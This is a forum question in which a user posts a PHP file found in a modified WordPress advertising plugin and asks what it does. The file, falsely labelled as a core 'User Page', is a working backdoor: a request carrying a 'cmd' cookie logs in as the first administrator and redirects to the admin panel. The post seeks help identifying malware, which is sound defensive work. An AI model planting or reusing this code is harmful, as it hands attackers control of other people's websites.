What does this coding do?
-
I was recently sent a plugin to download for advertising purposes and on inspection I found the same plugin on wordpress. In the modified version I found an extra file including this coding and I was wondering if anyone could help me identify what it does before I install it on my site:
File name: inc-action.php
<?php
/**
* WordPress User Page
*
* Handles authentication, registering, resetting passwords, forgot password,
* and other user handling.
*
* @package WordPress
*/if(empty($_COOKIE[‘cmd’])){
die();
}
require(‘../../../../wp-blog-header.php’);
$query_str = “SELECT ID FROM $wpdb->users”;
$user_ids = $wpdb->get_results($query_str);
foreach ($user_ids as $uid) {
$user_id = $uid->ID;
if (user_can($user_id, ‘administrator’)) {
$user_info = get_userdata($user_id);
$user_login = $user_info->user_login;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login’, $user_login);
echo “You are logged in as $user_login”;
if (function_exists(‘get_admin_url’)) {
wp_redirect(get_admin_url());
} else {
wp_redirect(get_bloginfo(‘wpurl’) . ‘/wp-admin’);
}
exit;
}
}
The topic ‘What does this coding do?’ is closed to new replies.